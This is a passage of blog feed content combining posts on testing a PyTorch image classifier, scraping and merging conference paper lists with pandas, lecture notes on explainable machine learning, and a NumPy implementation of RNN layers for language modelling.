        super(MyClass, self).__init__()
        self.model = nn.Sequential(
            nn.Conv2d(3, 32, 5, padding=2),
            nn.MaxPool2d(2),
            nn.Conv2d(32, 32, 5, padding=2),
            nn.MaxPool2d(2),
            nn.Conv2d(32, 64, 5, padding=2),
            nn.MaxPool2d(2),
            nn.Flatten(),
            nn.Linear(1024, 64),
            nn.Linear(64, 10)
        )

    def forward(self, x):
        x = self.model(x)
        return x


model = torch.load("myClass_0.pth", map_location=torch.device('cpu'))
print(model)

image = torch.reshape(image, (1, 3, 32, 32))
model.eval()
with torch.no_grad():
    output = model(image)
print(output)
print(output.argmax(1))

Load the test image:

    image_path = '../imgs/dog.png'
    image = Image.open(image_path)
    image = image.convert('RGB')

    transform = torchvision.transforms.Compose([torchvision.transforms.Resize((32, 32)),
    torchvision.transforms.ToTensor()])
    image = transform(image)
    print(image.shape)

Load the trained model. map_location=torch.device('cpu') lets a model trained on CUDA be tested on the CPU; without it, loading raises an error:

    model = torch.load("myClass_0.pth", map_location=torch.device('cpu'))
    print(model)

Print the prediction:

image = torch.reshape(image, (1, 3, 32, 32))
model.eval()
with torch.no_grad():
    output = model(image)
print(output)
print(output.argmax(1))
    tensor([[-2.7974, -0.1087,  0.5627,  1.2185,  1.4736,  1.4348,  2.3175,  1.3776,
    -3.5540, -0.6126]])
    tensor([6])

A Look at Open-Source Projects

​ Read the README.md; train.py is usually the entry point for training.

​ Training scripts usually take command-line arguments; see 【Python】Parser 通常用法 - 知乎 (zhihu.com).
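
A minimal sketch of the argparse pattern such train.py scripts typically use (the flag names --lr and --epochs here are illustrative, not from any specific project):

import argparse

parser = argparse.ArgumentParser(description='training options')
parser.add_argument('--lr', type=float, default=1e-2, help='learning rate')
parser.add_argument('--epochs', type=int, default=10, help='number of training epochs')
args = parser.parse_args()
print(args.lr, args.epochs)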

    ]]>
@@ -7656,7 +7656,7 @@ /posts/Homework-%E7%9C%8B%E5%BE%97%E5%A4%B4%E6%99%95%E7%9A%84%E6%95%B4%E7%90%86%E8%AE%BA%E6%96%87%E4%BB%BB%E5%8A%A1/ - Preface

​ On 3.14, after listening to the senior students' presentations, our advisor figured we were completely lost, so he assigned us the task of reading journals and organizing papers 😐…

​ The four of us were asked to compile the last three years' tables of contents for the AI journals and conferences in the CCF Recommended List of International Academic Conferences and Journals (《中国计算机学会推荐国际学术会议和期刊目录》), and to summarize research trends from them.

​ This post is just me rambling about everything I did to finish the task.

Main Text

《中国计算机学会推荐国际学术会议和期刊目录》 (the CCF Recommended List)

Web Scraping

​ Even after splitting up the work, there were still far too many papers to organize, so I hacked together a scraper to crawl the tables of contents.

​ Then I apparently crawled too much; after a while it ground to a halt orz. Almost a full day of work only got me half the content orz

​ Then I discovered that dblp itself supports batch-downloading tables of contents orz. The scraper is probably only faster for venues with more than 1000 entries or journals with too many issues.


Exporting to Excel


​ Import the resulting BibTeX files into Zotero one by one, then export them one by one as CSV files.

​ Next came merging the tables. After a few manual rounds it got too tedious, so I wrote a Python script to do the tidying automatically.

import os
import pandas as pd

path = r'D:\Study\1st-year-master\论文目录\Conf\A\NeurlPS'
save_file = path.split('\\')[-1]

data = pd.DataFrame(columns=['Publication Year', 'Author', 'Title'])

for index, file in enumerate(os.listdir(path)):
    if '.csv' in file:
        df = pd.read_csv(os.path.join(path, file))
        data = data.append(df[['Publication Year', 'Author', 'Title']])

print(data.head())
write = pd.ExcelWriter(os.path.join(path, save_file) + '.xlsx')  # create the xlsx file
data.to_excel(write, sheet_name='Sheet', index=False)  # write into the file's sheet
write.save()  # the file must be saved here, or it ends up empty

​ With that, each venue's last three years of tables of contents were merged into a single Excel sheet 😎!


Word Frequency Counting

​ I wanted Python to count the word frequencies across these tables of contents and pass that off as a trend analysis 😈! So, another burst of furious hacking:

import os
import pandas as pd
import re

path = r'D:\Study\1st-year-master\论文目录\xlsx'
save_path = r'D:\Study\1st-year-master\论文目录\freq'

for index, file in enumerate(os.listdir(path)):
    if '.xlsx' in file:
        df = pd.read_excel(os.path.join(path, file))
        series = df['Title'].str.split(' ').explode().value_counts()
        data = pd.DataFrame({'Word': series.index, 'Frequent': series.values})
        write = pd.ExcelWriter(os.path.join(save_path, file) + '_frequent.xlsx')  # create the xlsx file
        data.to_excel(write, sheet_name='Sheet' + str(index), index=False)  # one sheet per source file
        write.save()  # the file must be saved here, or it ends up empty

​ The top results were all words like "a", "of", and "from", with zero reference value 😅…

​ 杰杰 also built a word-frequency visualization, and sure enough it was all useless words as well… It suddenly struck me how well-rounded his skills are… he knows a bit of everything.


Translation

​ After the word-frequency plan failed, I decided to just search the papers by hand. Reading everything in English was painful, so I looked for a way to translate an Excel sheet… At first I overcomplicated things: convert to markdown, upload it to the blog, and let the browser translate; or call Youdao's API from Excel, which refused to translate once the request count climbed, balabala… In the end 伟哥 said Google Translate can take an uploaded Excel file and return a Chinese document directly orz


​ So I finally got a table of paper titles in Chinese! For some reason some English titles were left untranslated. Since there were not many files, I manually merged the Chinese and English titles into one table.

Summary

​ In the end it took roughly one evening plus one morning… Tens of thousands of titles nearly made my eyes glaze over 💨. Since judging research trends is subjective, the summary is probably not especially accurate; I also filtered out a few papers related to my own research direction.


Final Results

Journals

    A

    IEEE Transactions on Pattern Analysis and Machine Intelligence

Human pose estimation, human detection, 3D vision, CNNs, image inpainting, point clouds, GANs, super-resolution, image segmentation, video

    • Baselines extraction from curved document images via slope fields recovery
    • Mask TextSpotter: An end-to-end trainable neural network for spotting text with arbitrary shapes
    • Shape-matching GAN++: Scale controllable dynamic artistic text style transfer
    • Unambiguous text localization, retrieval, and recognition for cluttered scenes
    • Content and style aware generation of text-line images for handwriting recognition
    • Towards end-to-end text spotting in natural scenes
    • Deep generative modelling: A comparative review of VAEs, GANs, normalizing flows, energy-based and autoregressive models
    • A geometrical perspective on image style transfer with adversarial learning
    • GAN inversion: A survey
    • Arbitrary shape text detection via segmentation with probability maps
    • End-to-end handwritten paragraph text recognition using a vertical attention network
    • Real-time scene text detection with differentiable binarization and adaptive scale fusion
    • A survey on vision transformer

    B

    Data & Knowledge Engineering

Modeling, data, solving specific practical problems

    IEEE Transactions on Cybernetics

Algorithms, information security, classical machine learning methods (Markov chains, support vector machines)

    International Journal of Approximate Reasoning

Fuzzy logic

    Machine Learning

Classical machine learning, reinforcement learning

    Transactions of the Association for Computational Linguistics

Natural language processing, linguistics, BERT, Transformer

    C

    Applied Intelligence

Solving specific practical problems, super-resolution, pattern recognition, medicine, COVID-19 (prediction, detection), 3D vision, CNNs, graph neural networks, clustering, classification, emotion recognition

    • Anchor-free multi-orientation text detection in natural scene images
    Computer Speech & Language

Speech recognition, natural language processing

    Expert Systems

Solving specific practical problems, medicine, COVID-19, recommender systems

    IET Computer Vision

Human pose estimation, face recognition, object detection, CNNs, 3D vision

    • Stroke controllable style transfer based on dilated convolutions
    • KText: Arbitrary shape text detection using modified K-Means
    International Journal of Computational Intelligence and Applications

Solving specific practical problems

    International Journal of Uncertainty, Fuzziness and Knowledge-Based Systems

Fuzzy logic

    Machine Translation

Machine translation

    Neural Computing and Applications

Solving specific practical problems

    • Hybrid HMM/BLSTM system for multi-script keyword spotting in printed and handwritten documents with identification stage
    • SPN: short path network for scene text detection
    • Robustly detect different types of text in videos
    • Effective offline handwritten text recognition model based on a sequence-to-sequence approach with CNN-RNN networks
    • Historical document image binarization via style augmentation and atrous convolutions
    • Character-based handwritten text transcription with attention networks
    Pattern Recognition Letters

Pattern recognition (text, medical, human body), feature extraction, GANs

    • Compressing the CNN architecture for in-air handwritten Chinese character recognition
    • LPR-Net: Recognizing Chinese license plate in complex environments
    • An attention-based row-column encoder-decoder model for text recognition in Japanese historical documents
    • Assessing similarity in handwritten texts
    • Clustering online handwritten mathematical expressions
    • Beyond visual semantics: Exploring the role of scene text in image understanding
    • PMMN: Pre-trained multi-Modal network for scene text recognition
    • RectiNet-v2: A stacked network architecture for document image dewarping
    • Transformer-based approach for joint handwriting and named entity recognition in historical document
    • Cross lingual handwritten character recognition using long short term memory network with aid of elephant herding optimization algorithm
    • CE-text: A context-Aware and embedded text detector in natural scene images

    Conf

    A

    Conference on Neural Information Processing Systems

Datasets, graph neural networks, algorithms, GANs, meta-learning, contrastive learning, reinforcement learning, 3D, Transformer

    • OmniPrint: A configurable printed character synthesizer
    • Are transformers more robust than CNNs?
    • Diffusion models beat GANs on image synthesis
    International Conference on Machine Learning

Model attacks, algorithms, games, generative models, meta-learning, reinforcement learning, Transformer, Wasserstein distance

    B

    Conference on Empirical Methods in Natural Language Processing

NLP, BERT, reinforcement learning, abstractive summarization, text generation, transfer learning, Transformer, datasets, COVID-19

    • Cleaning dirty books: Post-OCR processing for previously scanned texts
    International Conference on Automated Planning and Scheduling

Path planning, reinforcement learning

    Conference on Uncertainty in Artificial Intelligence

Markov chains, Bayesian methods, unsupervised learning, Monte Carlo, reinforcement learning

    C

    Asian Conference on Computer Vision

Bayesian methods, Markov models, 3D vision, human recognition, GANs

    • Accurate arbitrary-shaped scene text detection via iterative polynomial parameter regression
    Conference on Computational Natural Language Learning

    NLP

    International Conference on Algorithmic Learning Theory

Online learning, reinforcement learning

    International Conference on Inductive Logic Programming

Too scattered, too few, too niche…

    International Joint Conference on Biometrics

Security, attacks, face recognition

Papers Related to My Field

No. | Title | Venue (tier) | Resource | Summary
1 | Baselines extraction from curved document images via slope fields recovery | Journals A | https://ieeexplore.ieee.org/document/8576546 | Proposes a slope-field-recovery method for extracting curved baselines from distorted document images taken with a hand-held camera
2 | Mask TextSpotter: An end-to-end trainable neural network for spotting text with arbitrary shapes | Journals A | https://paperswithcode.com/paper/mask-textspotter-an-end-to-end-trainable https://paperswithcode.com/paper/mask-textspotter-an-end-to-end-trainable-2 | Studies scene text spotting, which aims to detect and recognize text in natural images simultaneously
3 | Shape-matching GAN++: Scale controllable dynamic artistic text style transfer | Journals A | https://ieeexplore.ieee.org/document/9339900 https://openaccess.thecvf.com/content_ICCV_2019/papers/Yang_Controllable_Artistic_Text_Style_Transfer_via_Shape-Matching_GAN_ICCV_2019_paper.pdf | Explores the new problem of dynamic artistic text style transfer with controllable glyph stylization degree
4 | Unambiguous text localization, retrieval, and recognition for cluttered scenes | Journals A | https://paperswithcode.com/paper/unambiguous-text-localization-and-retrieval | Sequentially decodes intermediate convolutional representations of cluttered scene images into a set of distinct text instance detections
5 | Content and style aware generation of text-line images for handwriting recognition | Journals A | https://paperswithcode.com/paper/content-and-style-aware-generation-of-text | Proposes a method for generating handwritten text-line images conditioned on both visual appearance and textual content
6 | Towards end-to-end text spotting in natural scenes | Journals A | https://paperswithcode.com/paper/towards-end-to-end-text-spotting-in-natural | Text spotting in natural scene images
7 | Deep generative modelling: A comparative review of VAEs, GANs, normalizing flows, energy-based and autoregressive models | Journals A | https://paperswithcode.com/paper/deep-generative-modelling-a-comparative | A survey of deep generative models
8 | A geometrical perspective on image style transfer with adversarial learning | Journals A | https://www.researchgate.net/publication/343171440_A_Geometrical_Perspective_on_Image_Style_Transfer_With_Adversarial_Learning | Proposes a general framework for analyzing style transfer with adversarial learning through the lens of differential geometry
9 | GAN inversion: A survey | Journals A | https://paperswithcode.com/paper/gan-inversion-a-survey | Covers the main techniques of GAN inversion and their applications in image restoration and image manipulation
10 | Arbitrary shape text detection via segmentation with probability maps | Journals A | https://paperswithcode.com/paper/arbitrary-shape-text-detection-via | Proposes an innovative and robust segmentation-based detection method using probability maps for accurately detecting text instances
11 | End-to-end handwritten paragraph text recognition using a vertical attention network | Journals A | https://paperswithcode.com/paper/end-to-end-handwritten-paragraph-text | Unconstrained handwritten text recognition
12 | Real-time scene text detection with differentiable binarization and adaptive scale fusion | Journals A | https://paperswithcode.com/paper/real-time-scene-text-detection-with-1 | A segmentation-based scene text detector; proposes a differentiable binarization (DB) module that integrates binarization, one of the most important post-processing steps, into the segmentation network
13 | A survey on vision transformer | Journals A | https://arxiv.org/abs/2012.12556 | A survey of Transformers in computer vision
14 | Anchor-free multi-orientation text detection in natural scene images | Journals C | https://link.springer.com/article/10.1007/s10489-020-01742-z | Text detection in natural scene images
15 | Stroke controllable style transfer based on dilated convolutions | Journals C | https://ietresearch.onlinelibrary.wiley.com/doi/10.1049/iet-cvi.2019.0912 https://ietresearch.onlinelibrary.wiley.com/doi/pdfdirect/10.1049/iet-cvi.2019.0912 | Tunes VGG19 specifically for style transfer; the authors use dilated convolutions to extract texture information, giving the network stroke controllability
16 | KText: Arbitrary shape text detection using modified K-Means | Journals C | https://ietresearch.onlinelibrary.wiley.com/doi/10.1049/cvi2.12052 https://ietresearch.onlinelibrary.wiley.com/doi/epdf/10.1049/cvi2.12052 | A text detection method based on grouping characters with a modified K-Means
17 | Hybrid HMM/BLSTM system for multi-script keyword spotting in printed and handwritten documents with identification stage | Journals C | https://www.researchgate.net/publication/335462030_Hybrid_HMMBLSTM_system_for_multi-script_keyword_spotting_in_printed_and_handwritten_documents_with_identification_stage | Proposes a new script-independent method for spotting words in printed and handwritten multi-script documents
18 | SPN: short path network for scene text detection | Journals C | https://link.springer.com/article/10.1007/s00521-019-04093-0 | Scene text detection
19 | Robustly detect different types of text in videos | Journals C | https://link.springer.com/article/10.1007/s00521-020-04729-6 | Video text detection (overlaid, layered, and scene text)
20 | Effective offline handwritten text recognition model based on a sequence-to-sequence approach with CNN-RNN networks | Journals C | https://link.springer.com/article/10.1007/s00521-020-05556-5 | Handwritten text recognition: a CNN extracts features, and an RNN-LSTM encodes the visual features and decodes the character sequence present in the handwriting image
21 | Historical document image binarization via style augmentation and atrous convolutions | Journals C | https://link.springer.com/article/10.1007/s00521-020-05382-9 | Binarizes historical documents with neural network methods
22 | Character-based handwritten text transcription with attention networks | Journals C | https://paperswithcode.com/paper/attention-networks-for-image-to-text | Tackles handwritten text recognition (HTR) with attention encoder-decoder networks trained on character sequences rather than word sequences
23 | Compressing the CNN architecture for in-air handwritten Chinese character recognition | Journals C | https://www.sciencedirect.com/science/article/abs/pii/S0167865519303502 | Proposes a unified algorithm for effectively compressing CNNs for in-air handwritten Chinese character recognition (IAHCCR) to obtain better recognition performance
24 | LPR-Net: Recognizing Chinese license plate in complex environments | Journals C | https://www.sciencedirect.com/science/article/abs/pii/S0167865518306998 | An end-to-end deep learning architecture, the License Plate Recognition Network (LPR-Net), that recognizes license plates directly
25 | An attention-based row-column encoder-decoder model for text recognition in Japanese historical documents | Journals C | https://www.sciencedirect.com/science/article/abs/pii/S0167865520301811 | Recognizes input images containing multiple text lines from Japanese historical documents without explicit line segmentation; the system has three main parts: a feature extractor, a row-column encoder, and a decoder
26 | Assessing similarity in handwritten texts | Journals C | https://www.sciencedirect.com/science/article/abs/pii/S0167865520303093 | Synthesizing handwriting-style fonts
27 | Clustering online handwritten mathematical expressions | Journals C | https://www.sciencedirect.com/science/article/abs/pii/S0167865521001148 | Online handwritten mathematical expressions
28 | Beyond visual semantics: Exploring the role of scene text in image understanding | Journals C | https://arxiv.org/abs/1905.10622 | Jointly uses scene text and the visual channel for robust semantic interpretation of images
29 | PMMN: Pre-trained multi-Modal network for scene text recognition | Journals C | https://www.sciencedirect.com/science/article/abs/pii/S0167865521002622 | Proposes a pre-trained multi-modal network (PMMN) that pre-trains a vision model and a language model separately on visual and linguistic data, learning modality-specific knowledge for accurate scene text recognition
30 | RectiNet-v2: A stacked network architecture for document image dewarping | Journals C | https://arxiv.org/abs/2102.01120 | Proposes an end-to-end CNN architecture that produces a distortion-free document image from a warped document given as input
31 | Transformer-based approach for joint handwriting and named entity recognition in historical document | Journals C | https://arxiv.org/abs/2112.04189 | Extracting relevant information from handwritten documents
32 | Cross lingual handwritten character recognition using long short term memory network with aid of elephant herding optimization algorithm | Journals C | https://www.sciencedirect.com/science/article/abs/pii/S0167865522001490 | Handwritten character recognition
33 | CE-text: A context-Aware and embedded text detector in natural scene images | Journals C | https://www.sciencedirect.com/science/article/abs/pii/S0167865522001556 | Proposes CE-Text, a lightweight context-aware deep convolutional neural network (CNN) that encodes multi-level channel attention information to build discriminative feature maps for accurate and efficient text detection
34 | OmniPrint: A configurable printed character synthesizer | Conf A | https://paperswithcode.com/paper/omniprint-a-configurable-printed-character | A synthetic data generator for isolated printed characters, designed for machine learning research
35 | Are transformers more robust than CNNs? | Conf A | https://paperswithcode.com/paper/are-transformers-more-robust-than-cnns | A fair and in-depth comparison of Transformers and CNNs, focusing on robustness evaluation
36 | Diffusion models beat GANs on image synthesis | Conf A | https://paperswithcode.com/paper/diffusion-models-beat-gans-on-image-synthesis | Diffusion models achieve image sample quality superior to the current state-of-the-art generative models
37 | Cleaning dirty books: Post-OCR processing for previously scanned texts | Conf B | https://paperswithcode.com/paper/cleaning-dirty-books-post-ocr-processing-for | Improvements in language models now allow OCR errors to be detected and corrected without consulting the scanned images themselves
38 | Accurate arbitrary-shaped scene text detection via iterative polynomial parameter regression | Conf C | https://link.springer.com/chapter/10.1007/978-3-030-69535-4_15 | Proposes a robust scene text detection method for arbitrarily shaped text based on parameterized shape modeling and a regression scheme
    ]]>
    @@ -7820,7 +7820,7 @@ /posts/ML-%E6%9D%8E%E5%AE%8F%E6%AF%85-Lecture%209-Explainable%20AI/ - Preparation

[Machine Learning 2021] Explainability of Machine Learning Models (Explainable ML), Part 1: Why can a neural network correctly tell Pokémon from Digimon?


​ Sometimes the machine gets the right answer without truly understanding the question.


Why do we need Explainable ML?

• Loan issuers are required by law to explain their models.
• A medical diagnosis model is responsible for human life. Can it be a black box?
• If a model is used in court, we must make sure the model behaves in a nondiscriminatory manner.
• If a self-driving car suddenly acts abnormally, we need to explain why.


​ We can also use a model's explanations to tune its performance.


• Some models are intrinsically interpretable.
  • Linear models, for example.
  • But such models are usually not very powerful.
• Deep networks are hard to interpret: a deep network is a black box, but it is far more powerful than a linear model.


​ So we try to make deep networks more interpretable.


​ Decision trees are both powerful and interpretable.


The Goal of Explainable ML

• Completely understanding how the ML model works?
• We do not completely know how the brain works either!
• Yet we trust human judgment!


​ Interpretability in machine learning splits into two broad categories:

• Local Explanation
  • Why do you think this image is a cat?
• Global Explanation
  • What does a cat look like (to the model, not in a specific image)?

Local Explanation: Explain the Decision


An Image2Text-style question: exactly which parts of the cat does the machine recognize that make it decide the image shows a cat?


​ The paper [1311.2901] Visualizing and Understanding Convolutional Networks (arxiv.org) slides a gray square over the image to test whether the machine truly understands the content.


​ Saliency maps: [1312.6034] Deep Inside Convolutional Networks: Visualising Image Classification Models and Saliency Maps (arxiv.org) make the machine's focus visible.
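
A minimal vanilla gradient-saliency sketch (not the lecture's code; it assumes a trained classifier model and a preprocessed input batch img of shape (1, 3, H, W)):

import torch

def saliency_map(model, img):
    model.eval()
    img = img.clone().requires_grad_(True)      # track gradients with respect to the pixels
    score = model(img).max(dim=1).values.sum()  # score of the top class
    score.backward()                            # gradient of the score w.r.t. the input
    return img.grad.abs().amax(dim=1)           # per-pixel importance: max |gradient| over channels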


​ Case study: get a machine to distinguish Pokémon from Digimon.


model = Sequential()
model.add(Conv2D(32, (3, 3), padding='same', input_shape=(120, 120, 3)))
model.add(Activation('relu'))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(256, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(256, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(1024))
model.add(Activation('relu'))
model.add(Dense(2))
model.add(Activation('softmax'))

​ They wrote a convolutional neural network for this, and it performed remarkably well!


​ Drawing the saliency maps revealed that the machine's attention was all on the background orz


​ It later turned out the two datasets had different background colors, so the machine had learned the wrong cue.


​ Add random noise to the image several times, draw a saliency map for each noisy copy, and average them. [1603.02518] A New Method to Visualize Deep Neural Networks (arxiv.org)


​ Gradients do not necessarily reflect importance.

​ An alternative: [1611.02639] Gradients of Counterfactuals (arxiv.org)


• How does the network process its input?
  • Pull a few intermediate layers out of the deep network and look at what they contain.


​ After 8 hidden layers, the same sentence spoken by different people is gradually clustered together. icassp12_dbn.pdf (toronto.edu)


​ The paper [1902.10186] Attention is not Explanation (arxiv.org) argues that attention cannot serve as an explanation.

​ The paper [1908.04626] Attention is not not Explanation (arxiv.org) argues that some attention mechanisms can.


​ Probe a BERT model with a POS / NER classifier, but this classifier must not be too strong, or the recognition rate will be very low.


​ Speech recognition: pull out the intermediate representations. [1911.01102] What does a network layer hear? Analyzing hidden representations of end-to-end ASR through speech synthesis (arxiv.org)

[Machine Learning 2021] Explainability of Machine Learning Models (Explainable ML), Part 2: What does the cat in the machine's mind look like?

    Global Explanation


​ In a convolutional network, what features has each filter extracted?


​ Pulling an intermediate feature map straight out of the CNN and maximizing the response ($X^*=\arg\max_X y_i$) produces images that are hard to interpret; adding a prior from natural images helps ($X^*=\arg\max_X \left(y_i+R(X)\right)$, with a regularizer such as $R(X)=-\sum_{i,j}|X_{ij}|$).


​ With these visualizations we can tune hyperparameters more sensibly. [1506.06579] Understanding Neural Networks Through Deep Visualization (arxiv.org)


​ Use a simple model to imitate the outputs of the deep network; the simple model is then easy to interpret.


    ]]>
@@ -7928,7 +7928,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E8%BF%9B%E9%98%B6-%E8%87%AA%E7%84%B6%E8%AF%AD%E8%A8%80%E5%A4%84%E7%90%86-5-RNN/ - Preface

A feedforward network is simple in structure and easy to understand, and it can be applied to many tasks. It has one big weakness, however: it cannot handle time-series data well. More precisely, a plain feedforward network cannot adequately learn the properties (patterns) of sequential data. This is where the RNN (Recurrent Neural Network) comes in.

Main Text

5.1 Probability and Language Models

5.1.1 word2vec from a Probability Perspective

Recall word2vec's CBOW model. Consider a corpus written as the word sequence $w_1,w_2,…,w_T$; take the $t$-th word as the target and the words on either side of it (the $(t-1)$-th and $(t+1)$-th) as its context.

The probability that the target is $w_t$ given $w_{t−1}$ and $w_{t+1}$:

$$P(w_t|w_{t-1}, w_{t+1})$$

The CBOW model's loss function:

$$L=-\log P(w_t|w_{t-1}, w_{t+1})$$

5.1.2 Language Models

A language model assigns a probability to a sequence of words.

A model written as $P(w_t|w_1,…,w_{t−1})$ is called a conditional language model, and is sometimes simply called a language model.

5.1.3 Using the CBOW Model as a Language Model?

$$P(w_1, …, w_m)=\prod_{t=1}^{m}P(w_t|w_1,…,w_{t-1}) \approx \prod_{t=1}^{m}P(w_t|w_{t-2},w_{t-1})$$

Here we restrict the context to the 2 words on the left, so each factor can be approximated by the CBOW model (the CBOW model's posterior probability).

In machine learning and statistics you will often hear of the Markov property (or Markov models and Markov chains). The Markov property means that the future state depends only on the current state. When an event's probability depends only on the $N$ events before it, we call the model an $N$-th order Markov chain. The model shown here predicts the next word from only the previous 2 words, so it is a 2nd-order Markov chain.

5.2 RNN

5.2.1 A Network with a Loop

The defining feature of an RNN is that it has a loop (a cycle) through which data can keep circulating. By circulating data, an RNN remembers past information while being updated with the newest input.

png

5.2.2 Unrolling the Loop

png

At each time step, the RNN layer receives the input given to it at that step together with the output of the RNN layer at the previous step, and computes the current output from both. The computation is:

$$h_t=\tanh(h_{t-1}W_h+x_tW_x+b)$$

The RNN's $h$ stores its "state"; each time one step (one unit of time) passes, it is updated by the formula above. Many references call the RNN output $h_t$ the hidden state or the hidden state vector, and this book does the same.
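A quick NumPy check of this update with toy sizes (batch N=2, input dimension D=3, hidden dimension H=4):

import numpy as np

N, D, H = 2, 3, 4
x = np.random.randn(N, D)        # input at time t
h_prev = np.random.randn(N, H)   # hidden state from time t-1
Wx = np.random.randn(D, H)
Wh = np.random.randn(H, H)
b = np.random.randn(H)

h_next = np.tanh(np.dot(h_prev, Wh) + np.dot(x, Wx) + b)
print(h_next.shape)              # (2, 4)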

5.2.3 Backpropagation Through Time

Once the loop is unrolled, the RNN can be trained with (ordinary) error backpropagation: run the forward pass first, then the backward pass, to obtain the desired gradients. Because this is "error backpropagation on a network unrolled along the time axis", it is called Backpropagation Through Time, abbreviated BPTT.

5.2.4 Truncated BPTT

When handling long sequential data, the usual practice is to cut the network connections to a manageable length. Concretely, the network, grown too long along the time axis, is truncated at suitable points into several small networks, and error backpropagation is performed on each truncated piece. This method is called Truncated BPTT.

"Truncated" means cut off: Truncated BPTT is error backpropagation truncated to an appropriate length.

5.2.5 Mini-batch Learning with Truncated BPTT

png

As an example of learning with Truncated BPTT, take sequential data of length 1000 and truncate it in blocks of 10 time steps. How do we then train with a batch size of 2? In that case, as input to the RNN layers, the 1st sample is fed in order from the head of the data, while the 2nd sample is fed in order starting from the 500th position. That is, the starting position is shifted by 500, as the sketch below illustrates.
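The offset arithmetic for that layout, as a tiny sketch:

# Mini-batch layout described above: length-1000 data,
# truncation length 10, batch size 2 -> sample 2 starts at offset 500.
data_len, time_size, batch_size = 1000, 10, 2
jump = data_len // batch_size                 # 500
offsets = [i * jump for i in range(batch_size)]
print(offsets)                                # [0, 500]
# At iteration k, sample i reads indices offsets[i] + k*time_size, ...,
# offsets[i] + (k+1)*time_size - 1, so forward-pass continuity is preserved.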

5.3 Implementing the RNN

    png

    png

    $$h_t=\tanh(h_{t-1}W_h+x_tW_x+b)$$

import numpy as np

class RNN:
    def __init__(self, Wx, Wh, b):
        self.params = [Wx, Wh, b]
        self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]
        self.cache = None

    def forward(self, x, h_prev):
        """
        x: the input arriving from below
        h_prev: the input arriving from the left (previous hidden state)
        """
        Wx, Wh, b = self.params
        t = np.dot(h_prev, Wh) + np.dot(x, Wx) + b
        h_next = np.tanh(t)
        self.cache = (x, h_prev, h_next)
        return h_next  # the output at this step (= input to the next step) is h_next

    def backward(self, dh_next):
        Wx, Wh, b = self.params
        x, h_prev, h_next = self.cache

        dt = dh_next * (1 - h_next ** 2)
        db = np.sum(dt, axis=0)
        dWh = np.dot(h_prev.T, dt)
        dh_prev = np.dot(dt, Wh.T)
        dWx = np.dot(x.T, dt)
        dx = np.dot(dt, Wx.T)

        self.grads[0][...] = dWx
        self.grads[1][...] = dWh
        self.grads[2][...] = db
        return dx, dh_prev
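A quick shape check of the RNN layer above with toy sizes (this just exercises forward() and backward() once):

import numpy as np

N, D, H = 2, 3, 4
layer = RNN(np.random.randn(D, H), np.random.randn(H, H), np.zeros(H))
h = layer.forward(np.random.randn(N, D), np.zeros((N, H)))
dx, dh_prev = layer.backward(np.ones_like(h))
print(h.shape, dx.shape, dh_prev.shape)  # (2, 4) (2, 3) (2, 4)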

5.3.2 Implementing the Time RNN Layer

The Time RNN layer is a network that chains together T RNN layers; we implement that network as the TimeRNN class. The hidden state h of the RNN layer is kept in a member variable.

class TimeRNN:
    def __init__(self, Wx, Wh, b, stateful=False):
        """
        layers: keeps the T RNN layers in a list
        h: keeps the hidden state of the last RNN layer when forward() is called
        """
        self.params = [Wx, Wh, b]
        self.grads = [np.zeros_like(Wx), np.zeros_like(Wh),
                      np.zeros_like(b)]
        self.layers = None
        self.h, self.dh = None, None
        self.stateful = stateful

    def set_state(self, h):
        self.h = h

    def reset_state(self):
        self.h = None

    def forward(self, xs):
        Wx, Wh, b = self.params
        N, T, D = xs.shape
        D, H = Wx.shape

        self.layers = []
        hs = np.empty((N, T, H), dtype='f')

        if not self.stateful or self.h is None:
            self.h = np.zeros((N, H), dtype='f')

        for t in range(T):
            layer = RNN(*self.params)
            self.h = layer.forward(xs[:, t, :], self.h)
            hs[:, t, :] = self.h
            self.layers.append(layer)
        return hs

    def backward(self, dhs):
        Wx, Wh, b = self.params
        N, T, H = dhs.shape
        D, H = Wx.shape

        dxs = np.empty((N, T, D), dtype='f')
        dh = 0
        grads = [0, 0, 0]
        for t in reversed(range(T)):
            layer = self.layers[t]
            dx, dh = layer.backward(dhs[:, t, :] + dh)  # gradients summed at the branch
            dxs[:, t, :] = dx

            for i, grad in enumerate(layer.grads):
                grads[i] += grad

        for i, grad in enumerate(grads):
            self.grads[i][...] = grad
        self.dh = dh

        return dxs
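A quick shape check of the TimeRNN layer as well, feeding a whole (N, T, D) batch:

import numpy as np

N, T, D, H = 2, 5, 3, 4
trnn = TimeRNN(np.random.randn(D, H), np.random.randn(H, H), np.zeros(H),
               stateful=True)
hs = trnn.forward(np.random.randn(N, T, D))
dxs = trnn.backward(np.ones_like(hs))
print(hs.shape, dxs.shape)  # (2, 5, 4) (2, 5, 3)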

5.4 Implementing Layers for Sequential Data

We call a language model based on an RNN an RNNLM (RNN Language Model).

5.4.1 The Full Picture of the RNNLM

png

5.4.2 Implementing the Time Layers

Just as we implemented the Time RNN layer, we use Time Embedding, Time Affine and similar layers to implement layers that process an entire time series at once.

5.5 Training and Evaluating the RNNLM

5.5.1 Implementing the RNNLM

import sys
sys.path.append('..')
import numpy as np
from common.time_layers import *


class SimpleRnnlm:
    def __init__(self, vocab_size, wordvec_size, hidden_size):
        V, D, H = vocab_size, wordvec_size, hidden_size
        rn = np.random.randn
        # initialize the weights
        embed_W = (rn(V, D) / 100).astype('f')
        rnn_Wx = (rn(D, H) / np.sqrt(D)).astype('f')
        rnn_Wh = (rn(H, H) / np.sqrt(H)).astype('f')
        rnn_b = np.zeros(H).astype('f')
        affine_W = (rn(H, V) / np.sqrt(H)).astype('f')
        affine_b = np.zeros(V).astype('f')

        # create the layers
        self.layers = [
            TimeEmbedding(embed_W),
            TimeRNN(rnn_Wx, rnn_Wh, rnn_b, stateful=True),
            TimeAffine(affine_W, affine_b)
        ]
        self.loss_layer = TimeSoftmaxWithLoss()
        self.rnn_layer = self.layers[1]

        # collect all weights and gradients into lists
        self.params, self.grads = [], []
